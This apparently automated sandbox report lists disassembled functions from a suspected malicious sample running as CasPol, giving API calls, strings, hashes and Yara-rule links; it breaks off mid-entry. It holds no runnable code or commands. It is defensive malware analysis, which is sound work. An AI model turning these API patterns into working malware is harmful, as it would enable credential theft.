                                                                                                                                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                  Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                                                                                                                  • String ID: }A
                                                                                                                                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                  Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                  Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                  • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                  Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                                                  • String ID: .Wu
                                                                                                                                                                                                                                  • API String ID: 2081463915-3424199868
                                                                                                                                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2445788494-0
                                                                                                                                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                  Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                  Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1381354015-0
                                                                                                                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                  Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                  • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1297977491-0
                                                                                                                                                                                                                                  • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                  • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                  Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                  Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
